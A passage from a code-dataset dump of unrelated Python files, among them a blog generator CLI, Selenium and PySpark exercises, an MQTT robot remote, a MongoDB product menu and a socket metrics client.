coding: utf-8 -*-\n#!/usr/bin/env python\n# coding: utf-8\n\nimport json\nimport collections as cl\nimport sys\nimport datetime\n\ndef store(sentence, score, CM, word, k, count, Time):\n \"\"\"\n sentence :音声認識結果の文字列(1文)\n score :尤度\n CM :単語信頼度\n word :単語ごとの文字列\n \"\"\"\n\n\n sentence_list = [\"sentence1\", \"sentence2\", \"sentence3\", \"sentence4\", \"sentence5\", \"sentence6\", \"sentence7\", \"sentence8\", \"sentence9\", \"sentence10\"]\n\n '''データ等格納'''\n ys = cl.OrderedDict()#順番にデータ格納するため\n for i in range(len(sentence_list)):\n data = cl.OrderedDict()#順番にデータ格納するため\n data[\"sentence\"] = sentence[i]\n data[\"score\"] = score[i]\n data[\"word\"] = word[i]\n data[\"CM\"] = CM[i]\n\n\n ys[sentence_list[i]] = data #辞書型のデータ\n\n\n ys.update(Time)\n fs = open('./'+k+'_speech/'+k+'_'+str(count)+'_sentence.json','w')\n #fl = open(k+'sentence_log.json', 'a+')\n\n json.dump(ys,fs,indent=4,ensure_ascii=False)\n #json.dump(ys,fl,indent=4,ensure_ascii=False)\n return ys\n #indent がないと1行でJSONに書き込まれる(読みにくい)\n #ensure_ascii=False はJSONに書き込んだ時に文字化けしないように\n","sub_path":"julius_rec_store.py","file_name":"julius_rec_store.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"574872574","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\n\n#Driver Intialization\ndriver=webdriver.Chrome(executable_path=\"D:\\SeleniumPython\\drivers\\chromedriver.exe\")\ndriver.maximize_window()\n\n\ndriver.get(\"http://demo.automationtesting.in/Register.html\") # Launch Browser\n\n\nele=driver.find_element(By.ID,\"Skills\")\ndrp=Select(ele)\n\n#drp=Select(driver.find_element_by_id(\"Skills\"))\n\n#Select one option\n\n#Select by Visible Text\n#drp.select_by_visible_text(\"Adobe Photoshop\")\n\n# #Select by Index\n#drp.select_by_index(1)\n\n#Select by Value\n#drp.select_by_value(\"Backup Management\")\n\n\n#Count no of options present\nprint(len(drp.options))\n\n#Capture Options from dropdown\nall_options=drp.options\n\nfor option in all_options:\n print(option.text)\n\n\n# a=0\n# for option in all_options:\n# print(option.text)\n# if option.text==\"Windows1\":\n# a=1\n# break\n#\n# if a==1:\n# print(\"pass\")\n# else:\n# print(\"fail\")\n\ndriver.quit()\n\n","sub_path":"SeleniumPython/DropDown.py","file_name":"DropDown.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"377762747","text":"import yt\n\nyt.enable_parallelism()\n\nidx_start = 0\nidx_end = 50\ndidx = 1\nprefix = 'Data_'\n\nts = yt.load( [ prefix+'%06d'%idx for idx in range(idx_start, idx_end+1, didx) ] )\n\nfor ds in ts.piter():\n\n pz_dens = yt.ProjectionPlot( ds, 'z', 'density' )\n pz_dens.set_zlim( 'density', 1.0e-5, 5.0e-2 )\n pz_dens.set_font( {'size':16} )\n pz_dens.annotate_timestamp( corner='upper_right' )\n pz_dens.save()\n\n pz_Cloud0 = yt.ProjectionPlot( ds, 'z', 'Cloud0' )\n pz_Cloud0.set_zlim( 'Cloud0', 1.0e-5, 5.0e-2 )\n pz_Cloud0.set_font( {'size':16} )\n pz_Cloud0.annotate_timestamp( corner='upper_right' )\n pz_Cloud0.save()\n\n pz_Cloud1 = yt.ProjectionPlot( ds, 'z', 'Cloud1' )\n pz_Cloud1.set_zlim( 'Cloud1', 1.0e-5, 5.0e-2 )\n pz_Cloud1.set_font( {'size':16} )\n pz_Cloud1.annotate_timestamp( corner='upper_right' )\n pz_Cloud1.save()\n","sub_path":"test_problem_deprecated/Model_ParticleOnly/Plummer/plot_density.py","file_name":"plot_density.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586257702","text":"import os\r\nimport argparse\r\nimport fiona\r\n\r\nprogfiles = os.listdir(\"C:\\\\Program Files\")\r\nqgis = \"\\\"C:\\\\Program Files\\\\\"+[s for s in progfiles if \"QGIS\" in s][0]+\"\\\\OSGeo4W.bat\\\"\"\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--img\", help=\"path of input positive images\")\r\nparser.add_argument(\"--shp\", help=\"path of output in shapefile\")\r\nparser.add_argument(\"--out\", help=\"directory path of cropped output images\")\r\narg = parser.parse_args()\r\n\r\nimg = arg.img\r\nshp = arg.shp\r\nout = arg.out\r\n\r\nfs = fiona.open(shp)\r\nb=1\r\nfor a in fs:\r\n print(a)\r\n imgout = out+\"\\\\\"+str(b)+\".tif\"\r\n coord = a['geometry']['coordinates']\r\n x1, y1 = coord[0][3]\r\n x2, y2 = coord[0][1]\r\n if(x1>x2): ulx=x2; lrx=x1\r\n else: ulx=x1; lrx=x2\r\n if(y1>y2): uly=y1; lry=y2\r\n else: uly=y2; lry=y1\r\n cmd = qgis+\" gdal_translate -of GTiff -projwin \"+str(ulx)+\" \"+str(uly)+\" \"+str(lrx)+\" \"+str(lry)+\" \"+img+\" \"+imgout\r\n print(cmd)\r\n os.system(cmd)\r\n b+=1\r\n","sub_path":"croping_img_from_shp.py","file_name":"croping_img_from_shp.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"256684571","text":"import os\nimport re\nimport shutil\nimport functools\nimport traceback\nfrom urllib.parse import urlparse\n\nimport click\nfrom flask import url_for\n\nfrom .__meta__ import __version__\nfrom . import (\n app,\n root_folder,\n static_folder,\n theme_static_folder,\n pages_folder,\n posts_folder,\n raw_folder,\n load_posts,\n)\n\n\necho = click.echo\necho_green = functools.partial(click.secho, fg=\"green\")\necho_blue = functools.partial(click.secho, fg=\"blue\")\necho_red = functools.partial(click.secho, fg=\"red\")\necho_yellow = functools.partial(click.secho, fg=\"yellow\")\n\n\n@click.group(name=\"purepress\", short_help=\"A simple static blog generator.\")\n@click.version_option(version=__version__)\ndef cli():\n pass\n\n\nDEFAULT_PUREPRESS_TOML = \"\"\"\\\n[site]\ntitle = \"My Blog\"\nsubtitle = \"Here is my blog\"\nauthor = \"My Name\"\ntimezone = \"Asia/Shanghai\"\n\n[config]\nposts_per_index_page = 5\n\"\"\"\n\nDEFAULT_POST_TEMPLATE = \"\"\"\\\n---\ntitle: A demo {0}\n---\n\nThis is a demo {0}.\n\"\"\"\n\n\n@cli.command(\"init\", short_help=\"Initialize an instance.\")\ndef init_command():\n if os.listdir(root_folder):\n echo_red(f'The instance folder \"{root_folder}\" is not empty')\n exit(1)\n echo(\"Creating folders...\", nl=False)\n os.makedirs(posts_folder, exist_ok=True)\n os.makedirs(pages_folder, exist_ok=True)\n os.makedirs(static_folder, exist_ok=True)\n os.makedirs(raw_folder, exist_ok=True)\n echo_green(\"OK\")\n echo(\"Creating default purepress.toml...\", nl=False)\n with open(\n os.path.join(root_folder, \"purepress.toml\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n f.write(DEFAULT_PUREPRESS_TOML)\n echo_green(\"OK\")\n echo(\"Createing demo page...\", nl=False)\n with open(os.path.join(pages_folder, \"demo.md\"), mode=\"w\", encoding=\"utf-8\") as f:\n f.write(DEFAULT_POST_TEMPLATE.format(\"page\"))\n echo_green(\"OK\")\n echo(\"Createing demo post...\", nl=False)\n with open(\n os.path.join(posts_folder, \"1970-01-01-demo.md\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n f.write(DEFAULT_POST_TEMPLATE.format(\"post\"))\n echo_green(\"OK\")\n echo_green(\"OK! Now you can install a theme and preview the site.\")\n\n\n@cli.command(\"preview\", short_help=\"Preview the site.\")\n@click.option(\"--host\", \"-h\", default=\"127.0.0.1\", help=\"Host to preview the site.\")\n@click.option(\"--port\", \"-p\", default=8080, help=\"Port to preview the site.\")\n@click.option(\"--debug\", is_flag=True, default=False, help=\"Preview in debug mode.\")\ndef preview_command(host, port, debug):\n app.debug = debug\n app.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n app.run(host=host, port=port, debug=debug)\n\n\n@cli.command(\"build\", short_help=\"Build the site.\")\n@click.option(\n \"--url-root\",\n prompt=\"Please enter the url root (used as prefix of generated url)\",\n help=\"The url root of your site. For example, if you want to access the site \"\n 'through \"http://example.com/blog/\", \"http://example.com/blog/\" should be '\n \"passed in as the url root.\",\n)\ndef build_command(url_root):\n res = urlparse(url_root)\n app.config[\"PREFERRED_URL_SCHEME\"] = res.scheme\n app.config[\"SERVER_NAME\"] = res.netloc\n app.config[\"APPLICATION_ROOT\"] = res.path or \"/\"\n # mark as 'BUILDING' status, so that templates can react properly,\n app.config[\"BUILDING\"] = True\n\n try:\n with app.test_client() as client:\n build(client)\n echo_green('OK! Now you can find the built site in the \"build\" folder.')\n except Exception:\n traceback.print_exc()\n echo_red(\"Failed to build the site.\")\n exit(1)\n\n\ndef build(client):\n # prepare folder paths\n build_folder = os.path.join(root_folder, \"build\")\n build_static_folder = os.path.join(build_folder, \"static\")\n build_static_theme_folder = os.path.join(build_static_folder, \"theme\")\n build_pages_folder = build_folder\n build_posts_folder = os.path.join(build_folder, \"post\")\n build_categories_folder = os.path.join(build_folder, \"category\")\n build_tags_folder = os.path.join(build_folder, \"tag\")\n build_archive_folder = os.path.join(build_folder, \"archive\")\n build_index_page_folder = os.path.join(build_folder, \"page\")\n\n echo(\"Creating build folder...\", nl=False)\n if os.path.isdir(build_folder):\n shutil.rmtree(build_folder)\n elif os.path.exists(build_folder):\n os.remove(build_folder)\n os.mkdir(build_folder)\n echo_green(\"OK\")\n\n echo(\"Copying raw files...\", nl=False)\n copy_folder_content(raw_folder, build_folder)\n echo_green(\"OK\")\n\n echo(\"Copying theme static files...\", nl=False)\n os.makedirs(build_static_theme_folder, exist_ok=True)\n copy_folder_content(theme_static_folder, build_static_theme_folder)\n echo_green(\"OK\")\n\n echo(\"Copying static files...\", nl=False)\n copy_folder_content(static_folder, build_static_folder)\n echo_green(\"OK\")\n\n echo(\"Building custom pages...\", nl=False)\n for dirname, _, files in os.walk(pages_folder):\n rel_dirname = os.path.relpath(dirname, pages_folder)\n os.makedirs(os.path.join(build_pages_folder, rel_dirname), exist_ok=True)\n for file in files:\n rel_path = os.path.join(rel_dirname, file)\n dst_rel_path = re.sub(r\".md$\", \".html\", rel_path)\n dst_path = os.path.join(build_pages_folder, dst_rel_path)\n rel_url = \"/\".join(os.path.split(dst_rel_path))\n with app.test_request_context():\n url = url_for(\"page\", rel_url=rel_url)\n res = client.get(url)\n with open(dst_path, \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n with app.test_request_context():\n posts = load_posts(meta_only=True)\n\n echo(\"Building posts...\", nl=False)\n for post in posts:\n filename = post[\"filename\"]\n year, month, day, name = os.path.splitext(filename)[0].split(\"-\", maxsplit=3)\n dst_dirname = os.path.join(build_posts_folder, year, month, day, name)\n os.makedirs(dst_dirname, exist_ok=True)\n dst_path = os.path.join(dst_dirname, \"index.html\")\n with app.test_request_context():\n url = url_for(\"post\", year=year, month=month, day=day, name=name)\n res = client.get(url)\n with open(dst_path, \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building categories...\", nl=False)\n categories = set(\n functools.reduce(lambda c, p: c + p.get(\"categories\", []), posts, [])\n )\n for category in categories:\n category_folder = os.path.join(build_categories_folder, category)\n os.makedirs(category_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"category\", name=category)\n res = client.get(url)\n with open(os.path.join(category_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building tags...\", nl=False)\n tags = set(functools.reduce(lambda t, p: t + p.get(\"tags\", []), posts, []))\n for tag in tags:\n tag_folder = os.path.join(build_tags_folder, tag)\n os.makedirs(tag_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"tag\", name=tag)\n res = client.get(url)\n with open(os.path.join(tag_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building archive...\", nl=False)\n os.makedirs(build_archive_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"archive\")\n res = client.get(url)\n with open(os.path.join(build_archive_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building index...\", nl=False)\n with app.test_request_context():\n url = url_for(\"index\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n page_num = 2\n while res.status_code != 404:\n page_folder = os.path.join(build_index_page_folder, str(page_num))\n os.makedirs(page_folder, exist_ok=True)\n with app.test_request_context():\n url = url_for(\"index_page\", page_num=page_num)\n res = client.get(url)\n with open(os.path.join(page_folder, \"index.html\"), \"wb\") as f:\n f.write(res.data)\n page_num += 1\n echo_green(\"OK\")\n\n echo(\"Building feed...\", nl=False)\n with app.test_request_context():\n url = url_for(\"feed\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"feed.atom\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n echo(\"Building 404...\", nl=False)\n with app.test_request_context():\n url = url_for(\"page_not_found\")\n res = client.get(url)\n with open(os.path.join(build_folder, \"404.html\"), \"wb\") as f:\n f.write(res.data)\n echo_green(\"OK\")\n\n\ndef copy_folder_content(src, dst):\n \"\"\"\n Copy all content in src directory to dst directory.\n The src and dst must exist.\n \"\"\"\n for file in os.listdir(src):\n file_path = os.path.join(src, file)\n dst_file_path = os.path.join(dst, file)\n if os.path.isdir(file_path):\n shutil.copytree(file_path, dst_file_path)\n else:\n shutil.copy(file_path, dst_file_path)\n\n\ndef main():\n cli.main()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"purepress/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205104648","text":"\n\nimport tkinter\nfrom tkinter import ttk\n\nimport mqtt_remote_method_calls as com\n\nfrom tkinter import *\n\n\ndef main():\n find_and_go_to_color()\n\n\ndef find_and_go_to_color():\n left_speed = 600\n right_speed = 600\n mqtt_client = com.MqttClient()\n mqtt_client.connect_to_ev3()\n\n root = tkinter.Tk()\n root.title(\"MQTT Remote\")\n\n main_frame = ttk.Frame(root, padding=60, relief='raised')\n main_frame.grid()\n\n other_color_label_entry1 = ttk.Entry(main_frame, width=8)\n other_color_label_entry1.grid(row=1, column=4)\n other_color_button = ttk.Button(main_frame, text='Enter Other Color')\n other_color_button.grid(row=2, column=4)\n other_color_button['command'] = lambda: drive_to_color(mqtt_client, other_color_label_entry1)\n\n color_label_entry = ttk.Entry(main_frame, width=8)\n color_label_entry.grid(row=1, column=0)\n color_button = ttk.Button(main_frame, text=\"Enter Color\")\n color_button.grid(row=2, column=0)\n color_button['command'] = lambda: seek_color(mqtt_client, color_label_entry)\n\n label_color = Message(main_frame, text='Choose this entry box to pick up a color', justify=CENTER)\n label_color.grid(row=0, column=0)\n\n label_color_other = Message(main_frame, text='Choose this entry box to drive to a \\n color', justify=CENTER)\n label_color_other.grid(row=0, column=4)\n\n info_label = Message(main_frame, text='Be careful to only enter colors on the Pixy Camera', justify=CENTER)\n info_label.grid(row=0, column=2)\n\n forward_button = ttk.Button(main_frame, text=\"Forward\")\n forward_button.grid(row=2, column=2)\n forward_button['command'] = lambda: drive_forward(mqtt_client, right_speed,\n left_speed)\n root.bind('',\n lambda event: drive_forward(mqtt_client, right_speed, left_speed))\n\n left_button = ttk.Button(main_frame, text=\"Left\")\n left_button.grid(row=3, column=1)\n\n left_button['command'] = lambda: drive_left(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_left(mqtt_client, right_speed, left_speed))\n\n stop_button = ttk.Button(main_frame, text=\"Stop\")\n stop_button.grid(row=3, column=2)\n stop_button['command'] = lambda: stop(mqtt_client)\n root.bind('', lambda event: stop(mqtt_client))\n\n right_button = ttk.Button(main_frame, text=\"Right\")\n right_button.grid(row=3, column=3)\n right_button['command'] = lambda: drive_right(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_right(mqtt_client, right_speed, left_speed))\n\n back_button = ttk.Button(main_frame, text=\"Back\")\n back_button.grid(row=4, column=2)\n back_button['command'] = lambda: drive_backward(mqtt_client, right_speed, left_speed)\n root.bind('',\n lambda event: drive_backward(mqtt_client, right_speed, left_speed))\n\n up_button = ttk.Button(main_frame, text=\"Grab\")\n up_button.grid(row=5, column=1)\n up_button['command'] = lambda: send_up(mqtt_client)\n root.bind('', lambda event: send_up(mqtt_client))\n\n down_button = ttk.Button(main_frame, text=\"Lower\")\n down_button.grid(row=6, column=1)\n down_button['command'] = lambda: send_down(mqtt_client)\n root.bind('', lambda event: send_down(mqtt_client))\n\n q_button = ttk.Button(main_frame, text=\"Quit\")\n q_button.grid(row=5, column=3)\n q_button['command'] = (lambda: quit_program(mqtt_client, False))\n\n e_button = ttk.Button(main_frame, text=\"Exit\")\n e_button.grid(row=6, column=3)\n e_button['command'] = (lambda: quit_program(mqtt_client, True))\n\n root.mainloop()\n\n\ndef drive_forward(mqtt_client, right_speed, left_speed):\n print('drive_forward')\n mqtt_client.send_message('drive_forward', [right_speed, left_speed])\n\n\ndef drive_backward(mqtt_client, right_speed, left_speed):\n print('drive_backward')\n mqtt_client.send_message('drive_backward', [right_speed, left_speed])\n\n\ndef drive_left(mqtt_client, right_speed, left_speed):\n print('drive_left')\n mqtt_client.send_message('drive_left', [right_speed-200, left_speed-200])\n\n\ndef drive_right(mqtt_client, right_speed, left_speed):\n print('drive_right')\n mqtt_client.send_message('drive_right', [right_speed-200, left_speed-200])\n\n\ndef stop(mqtt_client):\n print('stop')\n mqtt_client.send_message('stop')\n\n\ndef send_up(mqtt_client):\n print(\"arm_up\")\n mqtt_client.send_message(\"arm_up\")\n\n\ndef send_down(mqtt_client):\n print(\"arm_down\")\n mqtt_client.send_message(\"arm_down\")\n\n\ndef quit_program(mqtt_client, shutdown_ev3):\n if shutdown_ev3:\n print(\"shutdown\")\n mqtt_client.send_message(\"shutdown\")\n mqtt_client.close()\n exit()\n\n\ndef seek_color(mqtt_client, color):\n print(\"finding color\")\n mqtt_client.send_message('choose_pixy_mode', [color.get()])\n\n\ndef drive_to_color(mqtt_client, other_color_entry1):\n print('driving to color')\n mqtt_client.send_message('pixy_mode_for_drive', [other_color_entry1.get()])\nmain()\n","sub_path":"projects/strozian/Project for Pc.py","file_name":"Project for Pc.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251297664","text":"import tempfile\nimport unittest\n\nfrom counter import count_file_lines\n\n\nclass TestCountFileLines(unittest.TestCase):\n def test_count(self):\n with tempfile.NamedTemporaryFile(mode='w') as f:\n f.write(\"\"\"one\ntwo\nthree\nfour\n\"\"\")\n f.flush()\n actual = count_file_lines(f.name)\n self.assertEqual(actual, 4)\n","sub_path":"PyQ/unit_test/39_3/tests/test_counter.py","file_name":"test_counter.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39328791","text":"from s3fs import S3FileSystem\nfrom fastparquet import ParquetFile\nfrom pandas import DataFrame\n\n\ndef connect(key: str, secret: str) -> S3FileSystem:\n \"\"\"Create a Boto3 client for S3 service.\"\"\"\n filesystem = S3FileSystem(key=key, secret=secret)\n return filesystem\n\n\ndef list_files(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> list:\n \"\"\"List files on S3 bucket on given URI.\"\"\"\n # Remove leading and trailing \"/\"\n s3_uri = s3_uri.strip('/')\n # Find all files on s3_uri in bucket\n paths = filesystem.glob(f'{bucket}/{s3_uri}/*.parquet')\n\n if paths:\n return paths\n\n raise FileExistsError(\n f'Bucket {bucket} contains no files matching \"{s3_uri}\" URI'\n )\n\n\ndef fetch(filesystem: S3FileSystem, bucket: str, s3_uri: str) -> DataFrame:\n \"\"\"Collect a file from S3 URI.\"\"\"\n paths = list_files(filesystem, bucket, s3_uri)\n parquet = ParquetFile(paths, open_with=filesystem.open)\n\n return parquet.to_pandas()\n","sub_path":"s3/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556436924","text":"from AModels.Producto import Producto\nfrom AModels.Categoria import Categoria\nfrom DHelpers.validacion import validacion\nfrom DHelpers.menu import Menu\n\n\nclass ControllerProducto:\n def __init__(self,tipo_empleado):\n self.productos = Producto()\n self.categorias = Categoria()\n self.salir = False\n self.validar = validacion()\n self.tipo_empleado=tipo_empleado\n def menu(self):\n try:\n while True:\n if(self.tipo_empleado==-1):\n print('''\n ==================\n Menu Producto\n ==================\n ''')\n lista_menu = [\"Mostrar Producto\", \"Salir\"]\n respuesta = Menu(lista_menu).show()\n\n if respuesta == 1:\n self.show_producto()\n else:\n self.salir = True\n break\n if(self.tipo_empleado!=-1):\n print('''\n ==================\n Menu Producto\n ==================\n ''')\n lista_menu = [\"Crear Producto\", \"Mostrar Producto\", \"Buscar Producto\", \"Salir\"]\n respuesta = Menu(lista_menu).show()\n\n if respuesta == 1:\n self.insert_producto()\n elif respuesta == 2:\n self.show_producto()\n elif respuesta == 3:\n self.search_producto()\n else:\n self.salir = True\n break\n except Exception as e:\n print(f'{str(e)}')\n\n def insert_producto(self):\n print('''\n ====================\n CREAR PRODUCTO\n ====================\n ''')\n while True:\n Nombre_producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto\")\n if self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto):\n print('El producto ingresado ya existe, ingrese otro producto')\n else:\n break\n \n categ_id=\"\"\n while True:\n nombre_categoria = self.validar.valiar_ingreso_texto(\"Ingrese la categoria del producto\")\n if self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria):\n categ_id=self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria)['_id']\n break\n else:\n print('La categoria ingresada no existe')\n stock = self.validar.valiar_ingreso_integer(\"Ingrese el stock del producto\")\n precio = self.validar.valiar_ingreso_double(\"Ingrese el precio del producto\") \n data = {\n 'nombres_producto': Nombre_producto,\n 'stock': stock,\n 'precio': precio,\n 'categoria_identificador':categ_id,\n 'categoria': nombre_categoria\n }\n self.productos.insert_producto(data)\n print('''\n =========================\n Producto Creado\n =========================\n ''')\n producto_creado=self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto)\n print(self.validar.print_table(producto_creado, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n input('Presiona una tecla para continuar...')\n \n def show_producto(self):\n try:\n print('''\n =====================\n MOSTRAR PRODUCTO\n =====================\n ''')\n condicion = {}\n seleccion = {\n '_id' : 1,\n 'nombres_producto': 1,\n 'stock': 1,\n 'precio': 1,\n 'categoria_identificador': 1,\n 'categoria': 1,\n\n } \n prod = self.productos.get_productos(condicion, seleccion) \n print('''\n =========================\n Productos\n =========================\n ''')\n print(self.validar.print_table(prod, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n input('Presiona una tecla para continuar...')\n \n except Exception as e:\n print(f'{str(e)}')\n \n def search_producto(self):\n try:\n print('''\n =====================\n BUSCAR PRODUCTO\n =====================\n ''')\n Nombre_Producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto a buscar\")\n producto_buscado=self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_Producto)\n if producto_buscado:\n print('''\n =========================\n Producto Encontrado\n =========================\n ''')\n print(self.validar.print_table(producto_buscado, ['ID', 'nombres_producto','stock','precio','categoria_identificador','categoria']))\n if self.validar.question('¿Deseas dar mantenimiento al producto?'):\n opciones = ['Editar', 'Eliminar', 'Salir']\n respuesta = Menu(opciones).show()\n print(respuesta)\n if respuesta == 1:\n self.update_producto(producto_buscado[\"_id\"])\n elif respuesta == 2:\n self.delete_producto(producto_buscado[\"_id\"])\n \n else:\n print(\"No existe ninguna categoria ingresada con ese nombre\")\n except Exception as e:\n print(f'{str(e)}')\n\n\n def delete_producto(self,id_producto):\n print('''\n ======================\n ELIMINAR PRODUCTO\n ======================\n ''')\n data = {\n '_id': id_producto,\n }\n self.productos.delete_producto(data) \n input('Presiona una tecla para continuar...')\n\n\n def update_producto(self,id_producto):\n print('''\n =========================\n ACTUALIZAR PRODUCTO\n =========================\n ''')\n cambio = {}\n if self.validar.question('¿Deseas cambiar el nombre del producto?'):\n while True:\n Nombre_producto = self.validar.valiar_ingreso_texto(\"Ingrese el nombre del producto\")\n if self.validar.validar_existencia_campo_valor_producto('nombres_producto',Nombre_producto):\n print('El producto ingresado ya existe, ingrese otro producto')\n else:\n cambio['nombres_producto']=Nombre_producto\n break\n if self.validar.question('¿Deseas cambiar la categoria del producto?'):\n while True:\n nombre_categoria = self.validar.valiar_ingreso_texto(\"Ingrese la categoria del producto\")\n if self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria):\n cambio['categoria_identificador']=self.validar.validar_existencia_campo_valor_categoria('nombres_categoria',nombre_categoria)['_id']\n cambio['categoria']=nombre_categoria\n break\n else:\n print('La categoria ingresada no existe')\n if self.validar.question('¿Deseas actualizar el stock del producto?'):\n stock= self.validar.valiar_ingreso_integer(\"Ingrese el stock del producto\")\n cambio['stock']=stock\n if self.validar.question('¿Deseas actualizar el precio del producto?'):\n precio = self.validar.valiar_ingreso_double(\"Ingrese el precio del producto\")\n cambio['precio']=precio\n \n condicion = {\n '_id': id_producto\n }\n self.productos.update_producto(condicion,cambio)\n \n print('''\n =========================\n Producto Actualizado\n =========================\n ''')\n\n\n","sub_path":"BControllers/Producto.py","file_name":"Producto.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600718006","text":"from pyspark.sql import SparkSession\n\ndef map_ratings(x):\n x = x.split(',')\n return (x[0], (float(x[2]), 1)) \n\nspark = SparkSession.builder.appName(\"Q2RDD\").getOrCreate()\nsc = spark.sparkContext\n\n# map(user_id, (rating, counter_for_all_ratings_of_a_user=1))\n# reduceByKey (user_id, (sum_of_ratings, counter_of_ratings))\n# map(user_id, (avg_rating_in_all_movies))\nrdd = sc.textFile(\"hdfs://master:9000/movies/ratings.csv\") \\\n .map(lambda x: map_ratings(x)) \\\n .reduceByKey(lambda x, y: (x[0]+y[0], x[1]+y[1])) \\\n .map(lambda x: (x[0], x[1][0]/x[1][1]))\n\ntotal_users = rdd.count()\nusers = rdd.filter(lambda x: True if(x[1] > 3.0) else False).count()\nper = users*100/total_users\n\nprint(\"-------------------------------------------------------------\")\nprint(\"Query 2 - RDD API Output\")\nprint(\"Percentage = \", per, \"%\")\nprint(\"-------------------------------------------------------------\")\n","sub_path":"code/1/rdd/q2_rdd.py","file_name":"q2_rdd.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229371742","text":"import socket\nimport time\n\n\nclass ClientError(OSError):\n pass\n\n\nclass Client:\n def __init__(self, host, port, timeout=None):\n self.host = str(host)\n self.port = int(port)\n self.timeout = float(timeout)\n\n def parse_server_response(resp, who_call=None):\n if who_call == \"put\":\n if resp == \"ok\\n\\n\":\n return True, \"Metric has sent successfully\"\n elif resp == \"error\\nwrong command\\n\\n\":\n return False, \"Server response: wrong command\"\n else:\n return False, \"Server hasn't confirmed receiving data\"\n elif who_call == \"get\":\n if resp == \"ok\\n\\n\":\n return True, {}\n elif resp[0:2] == \"ok\" and resp[-2:] == \"\\n\\n\":\n metric_dict = {}\n resp = resp.split(\"\\n\")[1:-2]\n for metric in resp:\n metric = metric.split()\n if metric[0] in metric_dict:\n metric_dict[metric[0]].append((int(metric[2]),\n float(metric[1])))\n else:\n metric_dict[metric[0]] = [(int(metric[2]), float(metric[1]))]\n for key in metric_dict:\n metric_dict[key].sort()\n return True, metric_dict\n else:\n return False, \"Server's response is not described\"\n\n def handle_connect(self, message, who_call=None):\n with socket.create_connection((self.host, self.port), self.timeout) as sock:\n try:\n sock.sendall(message.encode(\"utf-8\"))\n response = sock.recv(4096)\n resp = Client.parse_server_response(response.decode(\"utf-8\"), who_call)\n return resp\n except socket.timeout:\n return False, \"Client send data timeout\"\n except socket.error:\n return False, \"Client send data error\"\n\n def put(self, server_dot_metric, metric_value, timestamp=None):\n if not timestamp:\n timestamp = int(time.time())\n message = \"put {} {} {}\\n\".format(server_dot_metric, metric_value, timestamp)\n resp = self.handle_connect(message, who_call=\"put\")\n if not resp[0]:\n print(resp[1])\n raise ClientError\n else:\n print(resp[1])\n\n def get(self, metric):\n message = \"get {}\\n\".format(metric)\n resp = self.handle_connect(message, who_call=\"get\")\n if resp[0]:\n return resp[1]\n else:\n print(resp[1])\n raise ClientError\n\n\ndef main(host, port, timeout):\n client = Client(host, port, timeout)\n client.put(\"palm.cpu\", 0.5, timestamp=1150864247)\n client.put(\"palm.cpu\", 2.0, timestamp=1150864248)\n client.put(\"palm.cpu\", 0.5, timestamp=1150864248)\n client.put(\"eardrum.cpu\", 3, timestamp=1150864250)\n client.put(\"eardrum.cpu\", 4, timestamp=1150864251)\n client.put(\"eardrum.memory\", 4200000)\n print(client.get(\"palm.cpu\"))\n print(client.get(\"eardrum.memory\"))\n print(client.get(\"*\"))\n for i in range(0, 10):\n 